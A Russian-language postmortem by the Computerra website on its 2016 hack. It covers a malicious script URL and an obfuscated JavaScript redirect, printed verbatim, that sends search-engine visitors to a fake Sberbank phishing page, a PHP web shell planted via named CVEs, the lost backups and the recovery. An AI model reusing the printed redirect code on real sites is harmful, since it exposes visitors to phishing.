Как мы боролись за «Компьютерру»

Как вы могли заметить, в марте этого года наш сайт некоторое время был недоступен. На главной странице несколько дней отображалось уведомление о взломе. Сейчас основная часть восстановительных работ уже сделана. Сайт снова функционирует, и теперь мы публикуем историю о том, как боролись за «Компьютерру».

Отдельные сообщения о нарушении работы нашего сайта стали появляться практически сразу после того, как в начале года мы сменили сервер внутри хостинга. Время загрузки страниц существенно возросло, а читатели иногда писали «похоже, у вас вирус». На такие жалобы было сложно отреагировать. Антивирус на сервере ничего не находил, да и сервис облачной проверки VirusTotal определял наш сайт как чистый (0 из 67).

В конце февраля в комментариях и во внутренней рассылке промелькнуло сообщение о появлении фишинговой ссылки (при заходе на сайт появлялся посторонний баннер), но тогда его тоже восприняли как локальную проблему на компьютере нашедшего. На тот момент сотрудники «Компьютерры» никакой подозрительной активности в своих браузерах не замечали. У кого-то стоял AdBlock, у многих были ограничены JS-скрипты и настроены жёсткие правила фильтрации. Позже сервис Symantec Norton Safe внёс www.computerra.ru в чёрный список, но причины этого никак не объяснялись, а все антивирусы по-прежнему молчали.

Ситуация стала проясняться после того, как нам стали поступать по несколько сообщений в час. В частности проблему описала читательница Яна Киреёнок, программист С/С++ из Екатеринбурга. «Похоже, что сайт взломан, – написала она 14 марта в нашей группе Google+. – При переходе по ссылке с домена «goo.gl» запускается скрипт, который перенаправляет юзера на баннер «Сбербанка» (скорее всего, фальшивый, адрес не проверяла) и ещё грузится скрипт www.renniecoglemusic.com/wp-content/plugins/jquery/jquery.min.js (который вовсе не jquery.min). Забанивание домена со скриптом приводит просмотр ссылок в порядок».

На фоне таких сообщений у меня появился повод провести экспресс-аудит сайта. Для его проверки я сначала поднял виртуальную машину с чистой ОС и разными браузерами без дополнений. При заходе из неё на некоторые страницы нашего сайта действительно появлялся баннер, содержащий вот такой инжект:

http://www.fuchs-heizung.de/js/jquery.min.php?c_utt=G91825&c_utm=

Затем я стал копать дальше с помощью сервисов Qualys, WebPageTest и других. Вскоре увидел, что перенаправление происходит через сервис сокращения URL goo.gl. Ссылка такого вида была вставлена в конец одного из наших джава-скриптов. В коде использовались методы обфускации, затрудняющие обнаружение фишинговой ссылки антивирусными сканерами.

window.onload=function(){var pattern = new RegExp(/google.|yahoo.|yandex.|bing.|rambler.|go.mail./i); var tttt =
(location.href).replace(‘http://’+location.host+’/’, »);if(pattern.test(document.referrer)){document.location.href=’h’+’t’+’t’+’p’+’s:’+’/’+’/’+’rest-on.ru/sberbank/’;}}

Наш программист начал исправлять протрояненный скрипт вручную и проверять остальные скрипты, но найденное в них было лишь верхушкой айсберга. Как только мы начали активное противодействие, произошла новая и более мощная атака. Для её осуществления через уязвимость CVE-2015-3306 на сайт «Компьютерры» внедрили PHP-шелл (скрипт PHP, позволяющий удалённо выполнять команды на сервере через браузер). Дополнительно могла использоваться уязвимость в WordPress и OpenSSH (CVE-2015-5352). В результате НСД 17 марта 2016 г. были вновь изменены скрипты с фишинговыми ссылками, а затем и вовсе удалена большая часть контента. Мы потеряли медиа-файлы за несколько лет. Видимо, атаковавший действовал по принципу «не доставайся же ты никому!».

Уязвимости ProFTPD и OpenSSH.
Уязвимости ProFTPD и OpenSSH.

Тогда удалённые файлы не казались большой проблемой. «Вычистим сайт и восстановим иллюстрации из резервных копий», – думали мы. Однако тут очередной сюрприз нам преподнёс хостер, у которого мы арендовали площадку в Германии. Помните пословицу: «что русскому хорошо, то немцу…»? Это утверждение имеет и обратную силу. Регулярное создание бэкапов с ним надо было оформлять отдельным договором. В нашем же был только пункт «настройка резервного копирования», который не включал саму процедуру бэкапа. Хитро́!

Атака на сайт «Компьютерры» не закончилась удалением контента. Она продолжалась почти неделю, но уже не была результативной – просто мешала оперативному восстановлению.

В анализе ситуации нам экстренно помогли специалисты компании Deiteriy, подключившись к процессу поздно вечером 17 марта. Они выявили другие незакрытые уязвимости на сайте, провели расследование инцидента, выполнили углубленный аудит и сформулировали рекомендации о том, как усилить защиту «Компьютерры».

«Мы предполагаем, что атака не была целенаправленной, а стала следствием использования распространенных уязвимостей популярной CMS WordPress и установленных в ней плагинов, — комментирует Семён Уваров, техник по защите информации компании Deiteriy. — Ботнеты постоянно сканируют все публично доступные IP-адреса в Интернете на наличие неправильно сконфигурированных информационных систем и известных уязвимостей в них. К сожалению, доля таких систем в Интернете очень велика, поэтому подобные атаки в наши дни — не редкость».

Новым хостером для нас стала компания «ИТ-Град». Они обслуживают корпоративных клиентов, предоставляют облачные сервисы и делают основной фокус на безопасности. Наиболее свежий контент мы восстановили из локальных копий, сохранившихся у наших постоянных авторов. Остальные материалы продолжаем восстанавливать из прежних бэкапов, сохранившихся до переезда.

Пускай из-за атаки мы потеряли время и потрепали нервы, это справедливая цена за полученный урок. Тесты на проникновение стоят дорого, особенно если выполняются с наглядной демонстрацией. Итогом атаки на наш сайт стало решение многих наболевших проблем, повышение его безопасности и переезд на более качественный хостинг в России.

Что будем искать? Например,ChatGPT

Мы в социальных сетях